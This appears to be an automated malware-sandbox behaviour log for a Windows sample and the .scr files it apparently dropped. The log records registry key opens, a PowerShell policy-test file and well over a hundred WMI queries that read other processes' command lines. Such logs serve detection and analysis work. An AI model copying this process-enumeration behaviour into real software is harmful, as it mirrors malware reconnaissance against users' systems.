Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq1k4b3s.dwa.ps1 Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\gbcd\fff.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\gbcd\fff.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\gbcd\fff.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\gbcd\qqq.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\gbcd\qqq.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\gbcd\qqq.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\winnotify.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\winnotify.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\winnotify.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\winnotify.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\winnotify.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\winnotify.scr Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 860
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2584
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3012
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6028
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6024
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5592
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1280
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2572
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3432
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 412
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4288
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5148
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4716
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 400
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6432
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5568
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4852
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5996
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6852
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6104
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5124
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 812
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3828
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3396
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1668
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5128
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6404
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4248
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4672
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6168
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 356
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4664
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5172
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1212
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 328
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1636
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 772
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5512
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6804
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1200
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4216
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3784
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2052
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6896
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7756
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6116
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 748
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1608
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5648
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2892
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3752
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2524
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4920
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6752
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6904
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6316
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2004
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5448
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 704
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2424
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1992
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8024
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2416
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1976
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6988
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6276
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2536
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 912
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1096
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5836
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5404
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4972
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1520
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4492
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5396
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6688
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 976
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1080
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7112
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6680
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7104
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6672
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1064
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5200
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6232
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 624
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6656
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2936
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7080
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1044
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1904
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6644
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4056
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5440
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1312
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7060
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2316
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4036
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7396
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6472
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2708
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2736
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4028
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4456
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5748
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1868
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1436
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7476
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3588
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 568
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1428
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4444
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4360
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1852
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 556
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7020
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4432
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5724
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2948
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4512
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5544
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4044
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3556
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1400
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2692
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7000
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1396
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1388
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2248
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1384
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3536
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6552
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 516
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1376
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5684
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1804
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5680
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3524
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4832
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2656
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5672
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6964
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6528
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2216
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3076
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 488
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3500
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2636
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5652
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3496
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1340
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2632
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3924
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1752
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6504
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6072
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1760
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 932
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3476
